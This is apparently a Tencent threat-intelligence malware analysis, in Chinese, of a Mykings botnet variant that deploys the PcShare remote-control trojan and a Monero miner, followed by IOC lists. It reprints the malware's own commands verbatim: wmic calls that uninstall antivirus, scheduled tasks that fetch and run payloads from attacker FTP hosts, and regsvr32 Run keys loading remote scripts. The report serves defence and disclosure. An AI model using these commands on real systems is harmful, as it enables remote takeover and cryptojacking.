computer-1245714_1920

Mykings 僵尸网络新变种通过 PcShare 远程控制,已感染超 5 万台电脑挖矿

  • 浏览次数 40952
  • 喜欢 0
  • 评分 12345
感谢腾讯御见威胁情报中心来稿!
原文链接:https://mp.weixin.qq.com/s/wZvnq6gVnEdGSH6f6oG8MA

 

最新版Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制。Mykings僵尸网络木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。

一、背景

腾讯安全威胁情报中心检测到Mykings挖矿僵尸网络变种木马,更新后的Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制:可进行操作文件、服务、注册表、进程、窗口等多种资源,并且可以下载和执行指定的程序。

Mykings僵尸网络木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。

MyKings僵尸网络最早于2017年2月左右开始出现,该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括DDoS、Proxy(代理服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强,影响范围较广,对企业用户危害严重。根据门罗币钱包算力1000KH/s进行推测,Mykings僵尸网络目前已控制超过5万台电脑进行挖矿作业。

1

腾讯安全系列产品已支持检测、清除Mykings僵尸网络的最新变种,具体响应清单如下:

应用场景 安全产品 解决方案

腾讯T-Sec

威胁情报云查服务

(SaaS)

1)Mykings僵尸网络相关IOCs已入库。

各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics

腾讯T-Sec

高级威胁追溯系统

1)Mykings僵尸网络相关信息和情报已支持检索。

网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts

云原生安全

防护

云防火墙

(Cloud Firewall,CFW)

基于网络流量进行威胁检测与主动拦截,已支持:

1)    Mykings僵尸网络关联的IOCs已支持识别检测;

2)    通过协议特征检测主机挖矿行为;

3)    SQL Server弱口令爆破登陆行为检测;

有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw

腾讯T-Sec  主机安全

(Cloud Workload Protection,CWP)

1)    已支持查杀Mykings僵尸网络相关木马程序;

2)    云主机SQL Server弱口令风险项检测;

腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp

腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。

关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html

非云企业安全防护 腾讯T-Sec

高级威胁检测系统

(腾讯御界)

1)    已支持通过协议检测Mykings僵尸网络与服务器的网络通信;

2)    通过协议特征检测主机挖矿行为;

关于T-Sec高级威胁检测系统的更多信息,可参考:

https://cloud.tencent.com/product/nta

腾讯T-Sec终端安全管理系统(御点) 1)可查杀Mykings僵尸网络入侵释放的木马程序;

腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html

二、样本分析

mykings通过mssql爆破(1433端口)攻击windows服务器,爆破登陆成功后执行Powershell脚本power.txt。Power.txt首先关闭Windows Defender相关功能,然后下载kill.txt清除旧版挖矿程序。

2

Kill.txt根据进程名匹配旧版挖矿程序,其中标记为“1”代表清除对应的WMI启动项,列表中Mykings常用进程名包括:

uihost64.exe、dhelper.exe、msinfo.exe、u.exe、lsmose.exe、lsmos.exe、lsmo.exe、csrw.exe、csrw.exe、lsmosee.exe、lsmma.exe、lsmm.exe、lsmmaa.exe、lsmma.exe、new.exe、upsupx.exe、lsma.exe、lsmab.exe、lsmaaa.exe、lsma30.exe、lsma31.exe

3

删除旧版WMI事件过滤器“fuckyoumm2_filter”、消费者“fuckyoumm2_consumer”,从而删除WMI启动项。

4

2.1持久化

Power.txt接着下载uninstall.txt执行,完成卸载杀软、删除旧版挖矿木马、以及通过安装Windows计划任务、RUN启动项、WMI启动项进行本地持久化操作。

1、 卸载指定杀毒软件;

wmic.exe product where “name like ‘%Eset%'” call uninstall /nointeractive

wmic.exe product where “name like ‘%%Kaspersky%%'” call uninstall /nointeractive

wmic.exe product where “name like ‘%avast%'” call uninstall /nointeractive

wmic.exe product where “name like ‘%avp%'” call uninstall /nointeractive

wmic.exe product where “name like ‘%Security%'” call uninstall /nointeractive

wmic.exe product where “name like ‘%AntiVirus%'” call uninstall /nointeractive

wmic.exe product where “name like ‘%Norton Security%'” call uninstall /nointeractive

cmd /c “C:\Progra

1\Malwarebytes\Anti-Malware\unins000.exe” /verysilent /suppressmsgboxes /norestart

2、安装计划任务“oka”启动新版挖矿木马lsma12.exe,杀死进程java.exe;

schtasks /create /tn “oka” /tr “cmd /c start c:\windows\inf\aspnet\lsma12.exe -p” /ru “system” /sc onstart /F

wmic.exe process where ExecutablePath=’c:\\windows\\java\\java.exe’ call Terminate

3、安装计划任务”Mysa”、”Mysa2″,在每次系统启动时执行命令,使用账号test密码1433登陆FTP服务器ftp[.]ftp0930[.]host下载木马a1.exe和s1.rar并执行;

schtasks /create /tn “Mysa” /tr “cmd /c echo open ftp.ftp0930.host >s

echo test>>s

echo 1433>>s

echo binary>>s

echo get a1.exe c:\windows\update.exe>>s

echo bye>>s

ftp -s:s

c:\windows\update.exe” /ru “system” /sc onstart /F

schtasks /create /tn “Mysa2” /tr “cmd /c echo open ftp.ftp0930.host>ps

echo test>>ps

echo 1433>>ps

echo get s1.rar c:\windows\help\lsmosee.exe>>ps

echo bye>>ps

ftp -s:ps

c:\windows\help\lsmosee.exe” /ru “system” /sc onstart /F

4、设置拒绝“system”用户访问指定文件和路径;

cacls c:\windows\java\java.exe /e /d system

cacls c:\windows\temp\servtestdos.dll /e /d system

cacls C:\WINDOWS\Fonts\cd /e /d system

5、安装RUN启动项“start”负责下载执行脚本v1.sct,同时删除旧启动项“start1”,删除旧计划任务“Mysa3”、“ok”、“Mysa1”、“my1”。

reg add “HKLM\Software\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f

reg add “HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f

reg delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v “start1” /f

SCHTASKS /Delete /TN “Mysa3” /F

SCHTASKS /Delete /TN “ok” /F

SCHTASKS /Delete /TN “Mysa1” /F

SCHTASKS /Delete /TN “my1” /F

6、继续删除旧版的名称为“coronav”(新冠)的WMI启动项,同时安装新版的“coronav”WMI启动项,在其中通过Powershell下载和执行以下脚本:

http[:]//ruisgood.ru/power.txt

http[:]//gamesoxalic.com/power.txt

或者通过regsvr32下载和执行脚本:

http[:]//ruisgood.ru/s.txt

http[:]//gamesoxalic.com/s.txt

5

7、安装WMI启动项“fuckamm3”、“fuckamm4”启动新版挖矿木马程序:

6

8、Download.txt负责下载门罗币挖矿程序、Mykings更新程序和安装“暗云”木马感染程序:

7

2.2自更新

Download.txt下载的ups.dat为自解压程序,解压后释放多个文件到temp目录下,执行竞品挖矿木马清除、挖矿木马下载和启动,以及安装启动项等更新操作。释放的文件包括:

c:\windows\temp\ntuser.dat

c:\windows\temp\upx.exe

%temp%\c3.bat

%temp%\excludes

%temp%\n.vbs

8

9

Download.txt 下载的“暗云”木马max.rar会感染MBR执行shellcode,从云端获取Payload并最终获取Mykings相关木马文件。下载Payload网络流量如下:

10

首先从C2服务器http[:]//95.214.9.95/pld/cmd.txt下载cmd.txt。

11

然后向服务器(http[:]//95.214.9.95/pld/login.aspx?uid=***&info=***)发送上线信息,参数包括设备标识号uid和info,其中info包括计算机名、出口IP、CPU型号、CPU数量、内存大小信息,info数据经过base64编码,服务器接收数据后返回“AcceptOK”。

12

2.3 PcShare远控木马

返回数据cmd.txt中指定下载的20200809.rar为PcShare开源远控木马,该木马在github上有多个版本https[:]//github.com/LiveMirror/pcshare。木马下载后被拷贝至:

c:\windows\debug\item.dat,启动命令为:

rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa。

13

PcShare可根据服务端指令执行以下多种远控功能,该木马源代码在多个共享平台可供下载,黑客可以随意下载和重新修改编译。

1.枚举、创建、重命名、删除文件和目录

2.枚举和终止进程

3.编辑注册表项和值

4.枚举和修改服务

5.枚举和控制窗口

6.执行二进制文件

7.从C&C或提供的URL下载其他文件

8.将文件上传到C&C

9.执行shell命令

10.显示消息框

11.重新启动或关闭系统

14

PcShare连接C2服务器:192.187.111.66:5566。

15

2.4挖矿

Download.txt从地址http[:]//ruisgood.ru/1201.rar下载得到XMRig挖矿程序,从地址http[:]//ruisgood.ru/config2.json下载得到挖矿配置文件,然后启动挖矿进程:

c:\windows\inf\aspnet\lsma12.exe

挖矿时使用矿池:xmr-eu1.nanopool.org:14444

门罗币钱包:

4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka

16

查询该钱包,已挖矿获得143个XMR,折合人民币8万余元。而其矿池算力平均为1000Kh/s(盈利100美元/天),可推算约5万台电脑被控制挖矿。

17

IOCs

C&C

192.187.111.66:5566

95.214.9.95

Domain

ruisgood.ru

ftp.ftp0801.ru

gamesoxalic.com

ftp.ftp0930.host

js.down0116.info

js.mys2016.info

wmi.1217bye.host

js.5b6b7b.ru

up.mykings.pw

kriso.ru

f321y.com

down.f4321y.com

IP

199.168.100.74

173.247.239.186

174.128.235.243

223.25.247.152

167.88.180.175

139.5.177.10

173.247.239.186

185.239.227.82

URL

http[:]//ruisgood.ru/ups.dat

http[:]//ruisgood.ru/power.txt

http[:]//ruisgood.ru/1201.rar

http[:]//ruisgood.ru/uninstall.txt

http[:]//ruisgood.ru/max.rar

http[:]//ruisgood.ru/config2.json

http[:]//ruisgood.ru/s.txt

http[:]//ruisgood.ru/upx.exe

http[:]//ruisgood.ru/s.xsl

http[:]//ruisgood.ru/download2.txt

http[:]//ruisgood.ru/batpower.txt

http[:]//ruisgood.ru/ups.dat

http[:]//ruisgood.ru/download.txt

http[:]//ruisgood.ru/kill.txt

http[:]//ruisgood.ru/up.txt

http[:]//ruisgood.ru/wmi.txt

http[:]//ruisgood.ru/batpower.tx

http[:]//ruisgood.ru/up2.txt

http[:]//gamesoxalic.com/power.txt

http[:]//gamesoxalic.com/s.txt

ftp[:]//199.168.100.74/aa.exe

ftp[:]//199.168.100.74/1.dat

ftp[:]//ftp.ftp0801.ru/1.dat

ftp[:]//ftp.ftp0801.ru/aa.exe

ftp[:]//ftp.ftp0930.host/a1.exe

ftp[:]//ftp.ftp0930.host/s1.rar

http[:]//js.down0116.info:280/v1.sct

http[:]//174.128.235.243/wmi.txt

http[:]//174.128.235.243/upsupx2.exe

http[:]//174.128.235.243/u.exe

http[:]//199.168.100.74/20200809.rar

http[:]//199.168.100.74:8074/1201.rar

http[:]//173.247.239.186:9999/max.exe

http[:]//173.247.239.186:9999/u.exe

http[:]//185.239.227.82:8082/2.exe

http[:]//wmi.1217bye.host/S.ps1

http[:]//95.214.9.95/pld/cmd.txt

http[:]//223.25.247.152:8152/batpower.txt

http[:]//167.88.180.175:8175/kill.txt

http[:]//167.88.180.175:8175/uninstall.txt

http[:]//139.5.177.10:280/psa.jpg

http[:]//199.168.100.74/2.exe

http[:]//199.168.100.74:8074/2.exe

http[:]//173.247.239.186/2.exe

http[:]//185.239.227.82:8082/2.exe

http[:]//173.247.239.186:9999/2.exe

http[:]//js.5b6b7b.ru/v.sct

http[:]//js.5b6b7b.ru:280/v.sct

http[:]//up.mykings.pw/update.txt

http[:]//kriso.ru/java12.dat

http[:]//js.ftp0930.host/helloworld.msi

http[:]//f321y.com:8888/dhelper.dat

http[:]//down.f4321y.com:8888/kill.html

md5

20200809.rar dce4ac18798ea897cdc9e09e06b178be
max.rar bc7fc83ce9762eb97dc28ed1b79a0a10
u.exe d9c32681d65c18d9955f5db42154a0f3
ups.dat d1f978c88023639d6325805eb562de8c
upsupx2.exe b5cd8af63e35db23eb1c6a4eb8244c45
address.txt 83bdb3a6fb995788de262b22919524f1
cloud.txt 6b9b70f4e0c8885d12169045e906d698
cmd.txt 6def7a0c5707f24a912c79f6520ca86f
kill.txt 1573ab993edc98decc09423fd82ec5ed
micro f0129d85b17ee4d29ef52c63e0e548a4
power.txt 5670f0839333e4b160be05177601b40c
uninstall.txt 6092899216610fea5c65e416b34c1777
update.txt 581a86fea2afeb9b9d6d04c9a8f0a5c1
wmi.txt 6afc95f60630a588a7826608c70a60c8
wpd.jpg bbae338b0cac5a2d169b8c535f33bfa0
batpower.txt 40160c782c2a41eed8d8eaf0c706050a
up.txt 6c190a44db2118d9c07037d769e0a62d
ups.txt f41a8a69361fccc13344493c04a4f0d8
s.ps1 966abd05b7ad1b0b89d2a846f8a5a8f2
testav.dat d4f7a3f44ae3f21863b1440219388a5b
psa.jpg 9cb1c1a78ce3efe57eef5f128b43710a

门罗币钱包:

4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka

参考链接:

https://www.freebuf.com/articles/193260.html

https://www.freebuf.com/articles/network/161286.html

https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware